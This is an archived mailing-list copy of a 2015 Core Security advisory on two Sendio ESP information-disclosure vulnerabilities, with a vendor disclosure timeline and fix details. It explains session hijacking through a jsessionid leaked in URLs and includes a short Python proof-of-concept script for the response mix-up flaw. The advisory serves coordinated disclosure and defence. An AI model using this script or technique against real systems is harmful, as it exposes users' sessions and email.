[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] [CORE-2015-0010] - Sendio ESP Information Disclosure Vulnerability
From: CORE Advisories Team <advisories () coresecurity ! com>
Date: 2015-05-22 16:11:59
Message-ID: 555F554F.4000306 () coresecurity ! com
[Download RAW message or body]
1. Advisory Information
Title: Sendio ESP Information Disclosure Vulnerability
Advisory ID: CORE-2015-0010
Advisory URL: http://www.coresecurity.com/advisories/sendio-esp-information-disclosure-vulnerability
Date published: 2015-05-22
Date of last update: 2015-05-22
Vendors contacted: Sendio
Release mode: Coordinated release
2. Vulnerability Information
Class: OWASP Top Ten 2013 Category A2 - Broken Authentication and Session \
Management [CWE-930], Information Exposure [CWE-200]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0999, CVE-2014-8391
3. Vulnerability Description
Sendio [1] ESP (E-mail Security Platform) is a network appliance which \
provides anti-spam and anti-virus solutions for enterprises. Two \
information disclosure issues were found affecting some versions of this \
software, and can lead to leakage of sensitive information such as user's \
session identifiers and/or user's email messages.
4. Vulnerable Packages
Sendio 6 (14.1120.0)
Other products and versions might be affected too, but they were not \
tested.
5. Vendor Information, Solutions and Workarounds
Sendio informs us that [CVE-2014-0999] and [CVE-2014-8391] are fixed on \
Sendio software Version 7.2.4.
For [CVE-2014-0999], the vulnerability only exists for HTTP web sessions \
and not HTTPS web sessions. Sendio recommends that customers who have not \
upgraded to Version 7.2.4 should disallow HTTP on their Sendio product and \
only use HTTPS.
6. Credits
This vulnerability was discovered and researched by Martin Gallo from Core \
Security's Consulting Services Team. The publication of this advisory was \
coordinated by Joaquín Rodríguez Varela from Core Security's Advisories \
Team.
7. Technical Description / Proof of Concept Code
7.1. Disclosure of session cookie in Web interface URLs
The Sendio [1] ESP Web interface authenticates users with a session cookie \
named "jsessionid". The vulnerability [CVE-2014-0999] is caused due the way \
the Sendio ESP Web interface handles this authentication cookie, as the \
"jsessionid" cookie value is included in URLs when obtaining the content of \
emails. The URLs used by the application follow this format:
http://<ESP-web-interface-domain>:<ESP-web-interface-port>/sendio/ice/cmd/msg/body;jsessionid=<session-identifier-value>?id=<message-id>
This causes the application to disclose the session identifier value, \
allowing attackers to perform session hijacking. An attacker might perform \
this kind of attack by sending an email message containing links or \
embedded image HTML tags pointing to a controlled web site, and then \
accessing the victim's session cookies through the "Referrer" HTTP header. \
Accessing this authentication cookie might allow an attacker to hijack a \
victim's session and obtain access to email messages or perform actions on \
behalf of the victim.
7.2. Response mixup in Web interface
The vulnerability [CVE-2014-8391] is caused by an improper handling of \
users' sessions by the Web interface. Under certain conditions, this could \
lead to the server disclosing sensitive information that was intended for a \
different user. This information includes, for instance, other users' \
session identifiers, email message identifiers or email message subjects. \
In order to trigger this vulnerability, requests should be authenticated.
The following Python script can be used to trigger this vulnerability under \
certain circumstances:
import requests
domain = "target.domain.com" # The target domain
port = 8888 # The target port
jsessionid = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" # A valid jsessionid
num = 100000 # No of request to make
msgid = 9999999 # A valid message id to \
baseline the requests
url = "http://%s:%d/sendio/ice/cmd/msg/body;jsessionid=%s" % (domain, port, \
jsessionid)
def make_request(id):
params = {"id": str(id)}
headers = {"Cookie": "JSESSIONID=%s" % jsessionid}
return requests.get(url, params=params, headers=headers)
print "[*] Reaching the target to define baseline"
r = make_request(msgid)
baseline_length = r.headers["content-length"]
print "[*] Defined baseline: %d bytes" % baseline_length
for id in range(0, num):
r = make_request(msgid)
rlength = int(r.headers["content-length"])
if r.status_code == 200 and rlength != baseline_length:
print "\t", r.status_code, rlength, r.text
else:
print "\t", r.status_code, rlength
8. Report Timeline
2015-03-26: Core Security sent an initial notification to Sendio informing \
them that multiple vulnerabilities were found in one of their products, and \
requested their PGP keys in order to start an encrypted \
communication.
2015-03-27: Sendio replied that they would not be able to use PGP keys, but \
stated that their In/out SMTP gateway uses TLS, so that should suffice. \
They detailed that they were working on a fix for the \
"CS_SENDIO_JSESSIONID_DISCLOSURE" vulnerability and estimated it would be \
released by the end of April, 2015. They requested additional technical \
details for the "CS_SENDIO_INFO_LEAK" vulnerability.
2015-03-30: Core Security informed that understood that Sendio may not be \
able to use PGP keys, but Core doesn't consider the use of TLS as a \
replacement for PGP. Core Security requested to receive confirmation from \
Sendio in case they wanted to keep the communications unencrypted with PGP \
in order to send them a draft version of the advisory.
2015-03-30: Sendio confirmed that the communication can remain "as is" \
without PGP. They will inform Core once they have a specific date for \
publishing the fix. Sendio requested a PoC for the "CS_SENDIO_INFO_LEAK \
vulnerability".
2015-03-31: Core Security sent a draft version of the advisory and PoC to \
Sendio.
2015-03-31: Sendio confirmed reception of the advisory and PoC and informed \
Core that they would provide an update on their test on \
April 6.
2015-04-06: Sendio informed Core that they were able to reproduce the \
"CS_SENDIO_INFO_LEAK" issue and that were still analyzing it in order to \
create a fix.
2015-04-07: Core Security requested an estimated date for the release of a \
fix/update.
2015-04-13: Core Security again requested an answer from Sendio regarding \
the release of a fix/update.
2015-04-13: Sendio informed Core they were still working on a fix for the \
JSession issue that covers all use cases across Microsoft Outlook and the \
various supported web browsers. For the "CS_SENDIO_INFO_LEAK" they had \
coded a fix that was undergoing a System Test. Sendio estimated the release \
would take place on May 15, 2015.
2015-04-20: Sendio informed Core they were still planning to release the \
fixes by May 15, 2015.
2015-04-20: Core Security thanked Sendio for the update and informed them \
they would schedule their security advisory accordingly.
2015-04-24: Core Security requested that Sendio delay the release date of \
the fixes until Monday, May 18 in order to avoid publishing them on a \
Friday.
2015-04-27: Sendio informed Core that many of their customers have their \
Sendio systems set to "automatically update" on weekends. Sendio requested \
Core publish their advisory a week after the fix is published. Sendio also \
requested the ability to add some workarounds into Core's \
advisory.
2015-04-28: Core Security informed Sendio that they understood their update \
policy and let them know that it is Core's policy to publish their advisory \
the same day the fix is released in order to inform the affected users of \
its availability. Core also stated that they were willing to add any \
workarounds Sendio proposed.
2015-05-05: Sendio informed Core that they were still having problems \
developing a fix for the JSession vulnerability, therefore they may have to \
postpone the release date from May 15 to May 22.
2015-05-07: Core Security thanked Sendio for the update and requested to be \
kept informed in order to have enough time to schedule \
their advisory.
2015-05-12: Sendio confirmed that they needed to delay the publication of \
the fixes until May 21. Additionally, Sendio sent Core the proposed \
workarounds to be added in Core's advisory and requested a draft copy of \
it.
2015-05-15: Core Security informed Sendio it would reschedule the \
publication of their advisory and would send them a draft copy of it once \
they produced the final version.
2015-05-20: Sendio informed Core that they would publish the fixes at 10 \
PM, May 21.
2015-05-20: Core Security informed Sendio that based on their publication \
time they would have to delay the release of the advisory \
until Friday 22.
2015-05-22: Advisory CORE-2015-0010 published.
9. References
[1] http://www.sendio.com/.
10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with \
anticipating the future needs and requirements for information security \
technologies. We conduct our research in several important areas of \
computer security including system vulnerabilities, cyber attack planning \
and simulation, source code auditing, and cryptography. Our results include \
problem formalization, identification of vulnerabilities, novel solutions \
and prototypes for new technologies. CoreLabs regularly publishes security \
advisories, technical papers, project information and shared software tools \
for public use at: http://corelabs.coresecurity.com.
11. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats \
with security test and measurement solutions that continuously identify and \
demonstrate real-world exposures to their most critical assets. Our \
customers can gain real visibility into their security standing, real \
validation of their security controls, and real metrics to more effectively \
secure their organizations.
Core Security's software solutions build on over a decade of trusted \
research and leading-edge threat expertise from the company's Security \
Consulting Services, CoreLabs and Engineering groups. Core Security \
Technologies can be reached at +1 (617) 399-6980 or on the Web at: \
http://www.coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) \
2015 CoreLabs, and are licensed under a Creative Commons Attribution \
Non-Commercial Share-Alike 3.0 (United States) License: \
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories \
team, which is available for download at \
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic